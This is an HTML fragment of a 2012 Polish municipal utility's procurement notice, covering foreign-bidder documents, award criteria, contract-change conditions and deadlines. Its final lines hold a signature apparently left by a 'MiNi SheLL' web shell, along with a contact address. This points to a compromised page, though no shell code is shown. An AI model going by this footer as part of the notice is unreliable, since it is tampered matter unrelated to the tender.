<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Kryterium oceny funkcjonalności (PF) - 20</li>
<li>3 - Kryterium ceny obsługi powdrożeniowej - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany Umowy muszą być dokonywane z zachowaniem wymogów wynikających z przepisów Prawa zamówień publicznych.
2.	Dopuszczalne jest dokonywanie zmian Umowy o charakterze nieistotnym, przez co należy rozumieć zmiany nieodnoszące się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu zawarcie niniejszej umowy nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą. W powyższym kontekście nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych przykładowo: zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana osób wskazanych do kontaktów między Stronami, zmiana osób pełniących funkcję kierownicze w ramach realizacji Umowy.
3.	Określając warunki dokonania zmiany Umowy, sporządza się Protokół Konieczności i Protokół Negocjacji, biorąc pod uwagę w szczególności: 
1)	opis zmiany, 
2)	uzasadnienie zmiany, 
3)	koszt zmiany i sposób jego wyliczenia, 
4)	wpływ zmiany na wysokość wynagrodzenia, 
5)	czas wykonania zmiany, 
6)	wpływ zmiany na termin zakończenia umowy. 
4.	Przewiduje się możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
1)	zmiany przepisów mających wpływ na treść zawartej umowy, w tym w szczególności zmiana stawki podatku VAT od produktów i usług będących przedmiotem dostawy lub świadczenia usług ze strony Wykonawcy,
2)	uzasadniona przyczynami technicznymi konieczność zmiany sposobu wykonania umowy, korzystna dla Zamawiającego,
3)	zmiany w infrastrukturze Zamawiającego,
4)	wynikające ze specyfiki działalności Zamawiającego potrzeby w zakresie zmiany terminów wykonania i odbioru poszczególnych prac.
5.	Strony ustalają, iż strona występująca zmianę umowy na piśmie przedstawia powód oraz uzasadnienie dla zmiany. Druga stron w terminie 7 dni przedstawia swoje stanowisko.
6.	Zmiana umowy jest dopuszczalna, jeżeli wynika z okoliczności, za które żadna ze stron nie ponosi odpowiedzialności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pk-wronki.cil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Komunalne Sp. z o.o. we Wronkach
ul. Ratuszowa 3
64-510 Wronki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2012 godzina 12:00, miejsce: Przedsiębiorstwo Komunalne Sp. z o.o. we Wronkach
ul. Ratuszowa 3
64-510 Wronki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com